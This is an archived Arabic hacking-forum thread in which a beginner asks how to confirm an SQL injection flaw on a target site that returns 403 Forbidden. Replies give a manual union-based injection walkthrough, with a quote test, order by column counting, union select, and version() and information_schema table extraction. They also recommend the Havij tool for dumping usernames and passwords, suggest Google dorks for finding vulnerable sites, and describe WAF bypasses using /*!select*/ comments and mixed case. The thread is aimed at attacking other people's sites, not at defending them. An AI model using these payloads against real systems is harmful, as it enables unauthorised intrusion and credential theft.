مشاهدة النسخة كاملة : اي خبير بثغرة سكول يدرعم
M34BHM
04-12-2014, 02:10 AM
سلام عليكم . .. ودي اختصر الموضوع
اذ جيت احط نقطة الاستعلام لثغرة سكوول في نهاية الرابط يجي فوربدين
كيف اعرف ان المووقع مصاب .. !
ارجو المساعدددة
shhaby
04-12-2014, 12:07 PM
اخي تضع على الرقم المتغير علامة ( ') اذا طلعلك خطاء يعني الموقع مصاب .
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY title ASC' at line 1
وفي بعض الاحيان يخرج غير شكل من الخطاء . لكن هذا نوع فقط من الانواع .
وتكمل باقي الاستغلال اليدوي . بالتوفيق
----------------------------------------------
نقوم باظافة هذه العبارة
+order+by+
متبوعة برقم
هذا فقط لنحصل عدد الاعمدة الموجودة
نجرب 10 وممكن تكون اكثر
العبارة التالية
Unknown column '10' in 'order clause'
تعني ان هذا العدد من الاعمدة غير موجود لذلك سنحاول
ان ننقص من عدد الاعمدة حتى يختفي الخطأ
الان اختفى الخطأ في 7 يعني ان عدد الأعمدة هو 7 طبعا
نقوم باظافة العبارة التالية
+union+select+
متبوعة بعدد العمدة بالتتالي و بينها علامة ,
1,2,3,4,5,6,7
و ايضا نقوم باظافة علامة (- )قبل الرقم الذي بعد
=id
و في الاخير علامتي( -- )
لنوقف الاوامر
الان نعرف ان العمود المصاب هو 4
و هو الذي سنطبق به اوامر السكيول
الأمر الأول هو الإستعلام عن اصدار القاعدة
version()
نضعه مكان رقم 4
اصدار القاعدة هو:
5.5.14
الان نضع مكان 4 اثنان هذا الأمر
group_concat(table_name)
و في اخر الرابط نظيف هذه الأوامر
+from+information_schema.tables+where+ta*ble_schem a=database()--
Sålðe Åddîçt Håhér
04-12-2014, 07:08 PM
طريقتك قديمة استعمل برنامج havji هو يحقن ويتاكد اذا الموقع مصاب او لا ويستخرجبك الباس واليوزر ..
هاد شرحه http://www.aljyyosh.com/vb/showthread.php?t=38459
في ناس هون بالمنتدى ما بحب يعلم الميتدئين بكل جديد بظل يرهقهم ويتعبهم بخطوات طويله وصعبه بحب يحتفظ بالجديد لحالو
shhaby
04-12-2014, 07:31 PM
طريقتك قديمة استعمل برنامج havji هو يحقن ويتاكد اذا الموقع مصاب او لا ويستخرجبك الباس واليوزر ..
هاد شرحه http://www.aljyyosh.com/vb/showthread.php?t=38459
في ناس هون بالمنتدى ما بحب يعلم الميتدئين بكل جديد بظل يرهقهم ويتعبهم بخطوات طويله وصعبه بحب يحتفظ بالجديد لحالو
بص يا اخي اني لا ارهق المبتدئين ولا حاجة صحيح يوجد برنامج الهافج لكن صدقني لا تعتمد عليه كليا فقط في بعض المواقع او استخراج لوحة التحكم في بعض الاحيان .
لكن اتحداك ان يكون برنامج الهافج افضل من الحقن اليدوي... والسبب ان المبرمج لايستطيع ان يخترق جميع المواقع المصابة بثغرة السكيول في برنامجه
كيف يستطيع البرنامج تخطي ( Not Acceptable ) او ( Forbidden 403) .
على كل حال ما اعرف انت ليش تشكك في ردي مع العلم اني عاوز اساعد صاحب المشكلة واي سؤال اني حاظر واذا عاوز برنامج الهافج ارفعله البرنامج واضعه له في الموضوع . واخير ( هذه المرة الثانية التي انبهك فيها بالردود تبعك انتبه جيدا لا تتجاوز عندما تعقب على ردودي في المرة الثالثة ؟؟؟؟؟؟)
M34BHM
04-13-2014, 12:27 AM
اخي تضع على الرقم المتغير علامة ( ') اذا طلعلك خطاء يعني الموقع مصاب .
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY title ASC' at line 1
وفي بعض الاحيان يخرج غير شكل من الخطاء . لكن هذا نوع فقط من الانواع .
وتكمل باقي الاستغلال اليدوي . بالتوفيق
----------------------------------------------
نقوم باظافة هذه العبارة
+order+by+
متبوعة برقم
هذا فقط لنحصل عدد الاعمدة الموجودة
نجرب 10 وممكن تكون اكثر
العبارة التالية
Unknown column '10' in 'order clause'
تعني ان هذا العدد من الاعمدة غير موجود لذلك سنحاول
ان ننقص من عدد الاعمدة حتى يختفي الخطأ
الان اختفى الخطأ في 7 يعني ان عدد الأعمدة هو 7 طبعا
نقوم باظافة العبارة التالية
+union+select+
متبوعة بعدد العمدة بالتتالي و بينها علامة ,
1,2,3,4,5,6,7
و ايضا نقوم باظافة علامة (- )قبل الرقم الذي بعد
=id
و في الاخير علامتي( -- )
لنوقف الاوامر
الان نعرف ان العمود المصاب هو 4
و هو الذي سنطبق به اوامر السكيول
الأمر الأول هو الإستعلام عن اصدار القاعدة
version()
نضعه مكان رقم 4
اصدار القاعدة هو:
5.5.14
الان نضع مكان 4 اثنان هذا الأمر
group_concat(table_name)
و في اخر الرابط نظيف هذه الأوامر
+from+information_schema.tables+where+ta*ble_schem a=database()--
شكر ا على الردد .. لكن ي الغالي !
انت م فهمت وش اقصدد ..
اول م ضيف '
عشان اتاكد فيه ثغرة سكول ولا لا !
يجي لي فوربدين !
وش الحل كيف اتاكد اذ فيه ولا لا !
وكلامك صح هافيج م يقدر يتخطى الفوربدين
- - - تم التحديث - - -
shhaby
04-13-2014, 12:44 AM
اخي توجد دوركات كثيرة فيها مواقع sql لكن ليس كل المواقع مصابة بالثغرة انت تحط الدورك في قوقل وتخرجلك المواقع .
تدخل على موقع موقع وتحط بعد الرقم المتغير علامة (') واذا خرجلك خطاء Error يعني الموقع مصاب بالثغرة وتروح تطبق علية الاختراق اما يدوي واما بالهافج . لكن توجد هناك مواقع مرقعين الثغرة تشوف غيرها .
---------------------------------------
تخطي Forbidden 403 اثناء استخراج العامود المصاب
اضافة الفلتر
/*! */
على كلمة
select
لتصبح بهذا الشكل
/*!select*/
واذا لم تنجح الطريقة العب بكلمة
select
لتصبح بهذا الشكل
/*!SeLeCt*/
احرف سمول وأحرف كابتل
h m e
04-13-2014, 01:37 AM
كلام الاح شهاب مظبوط
M34BHM
04-13-2014, 02:12 PM
شكرا .. لكن لين الحين م فهمتني
موقع مستهدف .. !
لمن اضيف له هذي النقطة ( ' )
دايركت يجي لي Forbidden 403
هذى لسى بس ابي اتاكد وجالي كذا !
كيف راح اتاكد انه مصاب !
؟
h m e
04-13-2014, 11:33 PM
مش شرط (')
ممكن (*)
ولو مانفعش الاتنين يبقي الموقع مرقع الثغرة
real napster
04-20-2014, 12:20 AM
والله منكم نستفيد مشكورين يا جماعه
Powered by vBulletin® Version 4.2.6 by vBS Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.